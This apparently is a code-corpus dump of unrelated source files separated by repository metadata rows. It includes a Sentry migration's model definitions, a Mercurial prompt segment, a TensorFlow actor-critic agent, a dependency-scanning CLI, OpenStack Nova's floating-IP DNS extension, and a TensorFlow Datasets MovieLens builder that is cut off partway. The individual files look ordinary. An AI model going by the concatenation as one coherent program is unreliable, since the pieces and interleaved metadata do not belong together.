'last_password_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_column': "'first_name'", 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'session_nonce': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useravatar': {
'Meta': {'unique_together': '()', 'object_name': 'UserAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.User']"})
},
'sentry.useremail': {
'Meta': {'unique_together': "(('user', 'email'),)", 'object_name': 'UserEmail', 'index_together': '()'},
'date_hash_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'emails'", 'to': "orm['sentry.User']"}),
'validation_hash': ('django.db.models.fields.CharField', [], {'default': "u'tfq6tE9Duz48Ehl7NuSBrIVlGLs4yM09'", 'max_length': '32'})
},
'sentry.userip': {
'Meta': {'unique_together': "(('user', 'ip_address'),)", 'object_name': 'UserIP', 'index_together': '()'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'region_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'), ('user', 'organization', 'key'))", 'object_name': 'UserOption', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.userpermission': {
'Meta': {'unique_together': "(('user', 'permission'),)", 'object_name': 'UserPermission', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'permission': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.userreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'UserReport', 'index_together': "(('project', 'event_id'), ('project', 'date_added'))"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']", 'null': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_user_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.widget': {
'Meta': {'unique_together': "(('dashboard', 'order'), ('dashboard', 'title'))", 'object_name': 'Widget', 'index_together': '()'},
'dashboard': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Dashboard']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_options': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'display_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.widgetdatasource': {
'Meta': {'unique_together': "(('widget', 'name'), ('widget', 'order'))", 'object_name': 'WidgetDataSource', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'widget': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Widget']"})
}
}
complete_apps = ['sentry']
|
bsd-3-clause
| 6,805,013,253,530,824,000
| 94.341226
| 234
| 0.580177
| false
| 3.845138
| false
| false
| false
|
AlphaSmartDog/DeepLearningNotes
|
Note-6 A3CNet/Note-6.4 HS300指数增强/agent/agent.py
|
1
|
6362
|
import numpy as np
import tensorflow as tf
from agent.forward import ActorCriticNet
from params import *
def batch_choice(a, p):
action_list = [np.random.choice(a, p=i) for i in p]
return np.array(action_list)
# local network for advantage actor-critic, which is also known as A2C
class Agent(object):
def __init__(self, name, access, inputs_shape, action_size):
self.Access = access
self.action_size = action_size
batch_size = inputs_shape[0]
self.batch_size = batch_size
with tf.variable_scope(name):
# placeholder
# [Time, Batch, Rows, Columns, Channels]
self.inputs = tf.placeholder(
tf.float32, [None] + inputs_shape, 'inputs')
            # add a trailing channel dimension: [Time, Batch, Rows, Columns] -> [Time, Batch, Rows, Columns, 1]
inputs = tf.expand_dims(self.inputs, axis=-1)
# [T_MAX, Batch]
self.actions = tf.placeholder(
tf.int32, [None, batch_size], "actions")
# [T_MAX]
self.targets = tf.placeholder(
tf.float32, [None], "discounted_rewards")
self.gathers = tf.placeholder(
tf.int32, [None], 'gather_list')
# build network and adjust output probability
self.net = ActorCriticNet('AC-' + name)
policy, value = self.net(inputs, action_size)
policy = tf.clip_by_value(
policy, CLIP_MIN, CLIP_MAX, 'constraint')
# interface gather and step
# [Time, Batch, action_size] -> [T_MAX, Batch, action_size]
self.policy = tf.gather(policy, self.gathers)
self.value = tf.gather(value, self.gathers) # [T_MAX]
self.value = tf.squeeze(self.value, axis=1)
self.policy_step = policy[-1] # [Batch, action_size]
self.value_step = value[-1] # 1
# build other function
self._build_losses()
self._build_async_swap()
self._build_interface()
print('graph %s' % (str(name)))
def _build_losses(self):
# value loss
self.advantage = self.targets - self.value # [T_MAX]
value_loss = 0.5 * tf.square(self.advantage)
# policy loss
# [T_MAX, Batch, action_size] -> [T_MAX, Batch]
policy_action = tf.reduce_sum(
self.policy * tf.one_hot(self.actions, self.action_size), axis=2)
# [T_MAX, Batch]
policy_loss = -tf.log(policy_action) * tf.stop_gradient(
tf.expand_dims(self.advantage, axis=1))
# entropy loss [T_MAX, Batch]
entropy_loss = tf.reduce_sum(self.policy * tf.log(self.policy), axis=2)
# total loss
self.critic_loss = tf.reduce_mean(value_loss)
self.actor_loss = tf.reduce_mean(policy_loss + entropy_loss * ENTROPY_BETA)
self.total_loss = self.critic_loss + self.actor_loss
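        # Summary of the objective assembled above (standard A2C form, restated from the code):
        #   L_total = mean( 0.5 * (R_t - V(s_t))^2 )                                   # critic
        #           + mean( -log pi(a_t|s_t) * A_t + ENTROPY_BETA * sum_a pi * log pi )  # actor + entropy
        # where A_t = R_t - V(s_t) is wrapped in stop_gradient for the policy term.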
# interface
self.a_total_loss = self.total_loss
self.a_entropy_loss = tf.reduce_mean(entropy_loss)
self.a_policy_loss = tf.reduce_mean(policy_loss)
self.a_value_loss = tf.reduce_mean(value_loss)
self.a_critic_loss = self.critic_loss
self.a_actor_loss = self.actor_loss
self.a_advantage = tf.reduce_mean(self.advantage)
self.a_value_mean = tf.reduce_mean(self.value)
self.a_policy_mean = tf.reduce_mean(self.policy)
def _build_async_swap(self):
# Get gradients from local network using local losses
local_vars = self.get_trainable()
self.gradients = tf.gradients(self.total_loss, local_vars)
# Clip gradients
grads, self.global_norm = tf.clip_by_global_norm(
self.gradients, MAX_GRAD_NORM)
# Update global network
# Apply local gradients to global network
global_vars = self.Access.get_trainable()
self.update_global = self.Access.optimizer.apply_gradients(
zip(grads, global_vars))
# Update local network
assign_list = []
for gv, lv in zip(global_vars, local_vars):
assign_list.append(tf.assign(lv, gv))
self.update_local = assign_list
def _build_interface(self):
self.a_interface = [self.a_total_loss,
self.a_entropy_loss,
self.a_policy_loss,
self.a_value_loss,
self.a_actor_loss,
self.a_critic_loss,
self.a_advantage,
self.a_value_mean,
self.a_policy_mean,
self.a_advantage]
def get_trainable(self):
return list(self.net.get_variables())
def init_or_update_local(self, sess):
sess.run(self.update_local)
def get_step_policy(self, sess, inputs):
return sess.run(self.policy_step, {self.inputs: inputs})
def get_step_value(self, sess, inputs):
return sess.run(self.value_step, {self.inputs: inputs})
def get_losses(self, sess, inputs, actions, targets, gather_list):
"""
get all loss functions of network
:param sess:
:param inputs:
:param actions:
:param targets:
:return:
"""
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gather_list}
return sess.run(self.a_interface, feed_dict)
def train_step(self, sess, inputs, actions, targets, gathers):
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gathers}
sess.run(self.update_global, feed_dict)
# get stochastic action for train
def get_stochastic_action(self, sess, inputs, epsilon=0.9):
if np.random.uniform() < epsilon:
policy = sess.run(self.policy_step, {self.inputs: inputs})
return batch_choice(self.action_size, policy)
else:
return np.random.randint(self.action_size, size=self.batch_size)
# get deterministic action for test
def get_deterministic_policy_action(self, sess, inputs):
policy_step = sess.run(self.policy_step, {self.inputs: inputs})
return np.argmax(policy_step, axis=1)
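# A minimal usage sketch (illustrative only): it assumes `Access` is the shared
# global-network object passed in as `access`, exposing `optimizer` and
# `get_trainable()` as used above; the shapes below are made-up examples.
#
#   sess = tf.Session()
#   shared = Access(...)                                    # hypothetical constructor
#   worker = Agent('W0', shared, inputs_shape=[32, 50, 58], action_size=3)
#   sess.run(tf.global_variables_initializer())
#   worker.init_or_update_local(sess)                       # pull global weights
#   a = worker.get_stochastic_action(sess, inputs)          # inputs: [Time, 32, 50, 58]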
|
mit
| -5,111,055,656,513,035,000
| 37.095808
| 83
| 0.568375
| false
| 3.709621
| false
| false
| false
|
saghul/shline
|
segments/hg.py
|
1
|
1578
|
def add_hg_segment():
import os
import subprocess
env = {"LANG": "C", "HOME": os.getenv("HOME")}
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
try:
output = subprocess.check_output(['hg', 'status'], env=env)
except subprocess.CalledProcessError:
pass
else:
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
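        # Mapping implemented above, for hypothetical `hg status` lines:
        #   'M foo.txt' -> modified, '? bar.txt' -> untracked, '! baz.txt' -> missing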
try:
output = subprocess.check_output(['hg', 'branch'], env=env)
except (subprocess.CalledProcessError, OSError):
return
branch = output.rstrip()
if not branch:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return shline.append(' %s %s ' % (shline.branch, branch), fg, bg)
add_hg_segment()
|
mit
| -5,181,100,140,301,123,000
| 29.346154
| 80
| 0.529151
| false
| 3.954887
| false
| false
| false
|
tpflueger/CSCI4900
|
scripts/main.py
|
1
|
1140
|
# SPDX-License-Identifier: MIT
'''Usage:
{0} scan (FILE)
{0} dependencies (JARNAME)
{0} (--help | --version)
Arguments:
scan Scan pom file for dependencies
dependencies Show dependency tree for jarFile
'''
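# Example invocations (hypothetical file and jar names, shown only to
# illustrate the usage string above):
#   python main.py scan ./pom.xml
#   python main.py dependencies commons-lang3-3.4.jar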
import shutil
import sys
import os
from dependency_reader import DependencyReader
from docopt import docopt
__version__ = '1.0.0'
def main():
argv = docopt(
doc=__doc__.format(os.path.basename(sys.argv[0])),
argv=sys.argv[1:],
version=__version__
)
dependencyReader = DependencyReader()
if argv['scan']:
dependencyReader.getPom(os.path.abspath(argv['FILE']))
dependencyReader.getDependencies()
dependencyReader.relateDependencies()
dependencyReader.scanDependencies()
dependencyReader.createRelationships()
dependencyReader.retrieve_dependencies(None)
shutil.rmtree(dependencyReader.tempDirectoryPath)
elif argv['dependencies']:
dependencyReader.retrieve_dependencies(argv['JARNAME'])
shutil.rmtree(dependencyReader.tempDirectoryPath)
if __name__ == "__main__":
sys.exit(main())
|
mit
| -7,091,659,358,233,557,000
| 27.5
| 63
| 0.670175
| false
| 4.05694
| false
| false
| false
|
NoBodyCam/TftpPxeBootBareMetal
|
nova/api/openstack/compute/contrib/floating_ip_dns.py
|
1
|
10842
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import network
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'floating_ip_dns')
def make_dns_entry(elem):
elem.set('id')
elem.set('ip')
elem.set('type')
elem.set('domain')
elem.set('name')
def make_domain_entry(elem):
elem.set('domain')
elem.set('scope')
elem.set('project')
elem.set('availability_zone')
class FloatingIPDNSTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entry',
selector='dns_entry')
make_dns_entry(root)
return xmlutil.MasterTemplate(root, 1)
class FloatingIPDNSsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entries')
elem = xmlutil.SubTemplateElement(root, 'dns_entry',
selector='dns_entries')
make_dns_entry(elem)
return xmlutil.MasterTemplate(root, 1)
class DomainTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entry',
selector='domain_entry')
make_domain_entry(root)
return xmlutil.MasterTemplate(root, 1)
class DomainsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entries')
elem = xmlutil.SubTemplateElement(root, 'domain_entry',
selector='domain_entries')
make_domain_entry(elem)
return xmlutil.MasterTemplate(root, 1)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSDomainController, self).__init__()
@wsgi.serializers(xml=DomainsTemplate)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
domains = self.network_api.get_dns_domains(context)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@wsgi.serializers(xml=DomainTemplate)
def update(self, req, id, body):
"""Add or modify domain entry"""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
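        # A 'private' domain may only carry an availability zone and a 'public'
        # domain may only carry a project; any other combination is rejected.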
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
def delete(self, req, id):
"""Delete the domain identified by id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSEntryController, self).__init__()
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
entry = _create_dns_entry(entries[0], name, domain)
return _translate_dns_entry_view(entry)
@wsgi.serializers(xml=FloatingIPDNSsTemplate)
def index(self, req, domain_id):
"""Return a list of dns entries for the specified domain and ip."""
context = req.environ['nova.context']
authorize(context)
params = req.GET
floating_ip = params.get('ip')
domain = _unquote_domain(domain_id)
if not floating_ip:
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
return _translate_dns_entries_view(entrylist)
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def update(self, req, domain_id, id, body):
"""Add or modify dns entry"""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
if not entries:
# create!
self.network_api.add_dns_entry(context, address, name,
dns_type, domain)
else:
# modify!
self.network_api.modify_dns_entry(context, name, address, domain)
return _translate_dns_entry_view({'ip': address,
'name': name,
'type': dns_type,
'domain': domain})
def delete(self, req, domain_id, id):
"""Delete the entry identified by req and id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
self.network_api.delete_dns_entry(context, name, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class Floating_ip_dns(extensions.ExtensionDescriptor):
"""Floating IP DNS support"""
name = "Floating_ip_dns"
alias = "os-floating-ip-dns"
namespace = "http://docs.openstack.org/ext/floating_ip_dns/api/v1.1"
updated = "2011-12-23T00:00:00+00:00"
def __init__(self, ext_mgr):
self.network_api = network.API()
super(Floating_ip_dns, self).__init__(ext_mgr)
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-floating-ip-dns',
FloatingIPDNSDomainController())
resources.append(res)
res = extensions.ResourceExtension('entries',
FloatingIPDNSEntryController(),
parent={'member_name': 'domain',
'collection_name': 'os-floating-ip-dns'})
resources.append(res)
return resources
|
apache-2.0
| 3,639,136,114,536,705,000
| 34.547541
| 78
| 0.590481
| false
| 4.19582
| false
| false
| false
|
tensorflow/datasets
|
tensorflow_datasets/structured/movielens.py
|
1
|
17907
|
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MovieLens dataset."""
import os
import textwrap
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.structured import movielens_parsing
_CITATION = """
@article{10.1145/2827872,
author = {Harper, F. Maxwell and Konstan, Joseph A.},
title = {The MovieLens Datasets: History and Context},
year = {2015},
issue_date = {January 2016},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {5},
number = {4},
issn = {2160-6455},
url = {https://doi.org/10.1145/2827872},
doi = {10.1145/2827872},
journal = {ACM Trans. Interact. Intell. Syst.},
month = dec,
articleno = {19},
numpages = {19},
keywords = {Datasets, recommendations, ratings, MovieLens}
}
"""
_DESCRIPTION = """
This dataset contains a set of movie ratings from the MovieLens website, a movie
recommendation service. This dataset was collected and maintained by [GroupLens]
(https://grouplens.org/), a research group at the University of Minnesota. There
are 5 versions included: "25m", "latest-small", "100k", "1m", "20m". In all
datasets, the movies data and ratings data are joined on "movieId". The 25m
dataset, latest-small dataset, and 20m dataset contain only movie data and
rating data. The 1m dataset and 100k dataset contain demographic data in
addition to movie and rating data.
- "25m": This is the latest stable version of the MovieLens dataset. It is
recommended for research purposes.
- "latest-small": This is a small subset of the latest version of the MovieLens
dataset. It is changed and updated over time by GroupLens.
- "100k": This is the oldest version of the MovieLens datasets. It is a small
dataset with demographic data.
- "1m": This is the largest MovieLens dataset that contains demographic data.
- "20m": This is one of the most used MovieLens datasets in academic papers
along with the 1m dataset.
For each version, users can view either only the movies data by adding the
"-movies" suffix (e.g. "25m-movies") or the ratings data joined with the movies
data (and users data in the 1m and 100k datasets) by adding the "-ratings"
suffix (e.g. "25m-ratings").
The features below are included in all versions with the "-ratings" suffix.
- "movie_id": a unique identifier of the rated movie
- "movie_title": the title of the rated movie with the release year in
parentheses
- "movie_genres": a sequence of genres to which the rated movie belongs
- "user_id": a unique identifier of the user who made the rating
- "user_rating": the score of the rating on a five-star scale
- "timestamp": the timestamp of the ratings, represented in seconds since
midnight Coordinated Universal Time (UTC) of January 1, 1970
The "100k-ratings" and "1m-ratings" versions in addition include the following
demographic features.
- "user_gender": gender of the user who made the rating; a true value
corresponds to male
- "bucketized_user_age": bucketized age values of the user who made the rating,
the values and the corresponding ranges are:
- 1: "Under 18"
- 18: "18-24"
- 25: "25-34"
- 35: "35-44"
- 45: "45-49"
- 50: "50-55"
- 56: "56+"
- "user_occupation_label": the occupation of the user who made the rating
represented by an integer-encoded label; labels are preprocessed to be
consistent across different versions
- "user_occupation_text": the occupation of the user who made the rating in
the original string; different versions can have different set of raw text
labels
- "user_zip_code": the zip code of the user who made the rating
In addition, the "100k-ratings" dataset also includes a feature "raw_user_age",
which is the exact age of the user who made the rating.
Datasets with the "-movies" suffix contain only "movie_id", "movie_title", and
"movie_genres" features.
"""
_FORMAT_VERSIONS = ['25m', 'latest-small', '20m', '100k', '1m']
_TABLE_OPTIONS = ['movies', 'ratings']
class MovieLensConfig(tfds.core.BuilderConfig):
"""BuilderConfig for MovieLens dataset."""
def __init__(self,
format_version: Optional[str] = None,
table_option: Optional[str] = None,
download_url: Optional[str] = None,
parsing_fn: Optional[Callable[[str], Iterator[Tuple[int, Dict[
str, Any]]],]] = None,
**kwargs) -> None:
"""Constructs a MovieLensConfig.
Args:
format_version: a string to identify the format of the dataset, one of
'_FORMAT_VERSIONS'.
table_option: a string to identify the table to expose, one of
'_TABLE_OPTIONS'.
download_url: a string url for downloading the dataset.
parsing_fn: a callable for parsing the data.
**kwargs: keyword arguments forwarded to super.
Raises:
ValueError: if format_version is not one of '_FORMAT_VERSIONS' or if
table_option is not one of '_TABLE_OPTIONS'.
"""
if format_version not in _FORMAT_VERSIONS:
raise ValueError('format_version must be one of %s.' % _FORMAT_VERSIONS)
if table_option not in _TABLE_OPTIONS:
raise ValueError('table_option must be one of %s.' % _TABLE_OPTIONS)
super(MovieLensConfig, self).__init__(**kwargs)
self._format_version = format_version
self._table_option = table_option
self._download_url = download_url
self._parsing_fn = parsing_fn
@property
def format_version(self) -> str:
return self._format_version
@property
def table_option(self) -> str:
return self._table_option
@property
def download_url(self) -> str:
return self._download_url
@property
def parsing_fn(
self) -> Optional[Callable[[str], Iterator[Tuple[int, Dict[str, Any]]],]]:
return self._parsing_fn
class Movielens(tfds.core.GeneratorBasedBuilder):
"""MovieLens rating dataset."""
BUILDER_CONFIGS = [
MovieLensConfig(
name='25m-ratings',
description=textwrap.dedent("""\
This dataset contains 25,000,095 ratings across 62,423 movies,
created by 162,541 users between January 09, 1995 and November 21,
2019. This dataset is the latest stable version of the MovieLens
dataset, generated on November 21, 2019.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='25m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='25m-movies',
description=textwrap.dedent("""\
This dataset contains data of 62,423 movies rated in the 25m
dataset."""),
version='0.1.0',
format_version='25m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
# The latest-small dataset is changed over time. Its checksum might need
# updating in the future.
MovieLensConfig(
name='latest-small-ratings',
description=textwrap.dedent("""\
This dataset contains 100,836 ratings across 9,742 movies, created
by 610 users between March 29, 1996 and September 24, 2018. This
            dataset was generated on September 26, 2018 and is a subset of
the full latest version of the MovieLens dataset. This dataset
is changed and updated over time.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='latest-small',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='latest-small-movies',
description=textwrap.dedent("""\
This dataset contains data of 9,742 movies rated in the
latest-small dataset."""),
version='0.1.0',
format_version='latest-small',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
MovieLensConfig(
name='100k-ratings',
description=textwrap.dedent("""\
This dataset contains 100,000 ratings from 943 users on 1,682
movies. This dataset is the oldest version of the MovieLens
dataset.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. This dataset contains demographic data of users in
addition to data on movies and ratings."""),
version='0.1.0',
format_version='100k',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_ratings_data,
),
MovieLensConfig(
name='100k-movies',
description=textwrap.dedent("""\
This dataset contains data of 1,682 movies rated in the 100k
dataset."""),
version='0.1.0',
format_version='100k',
table_option='movies',
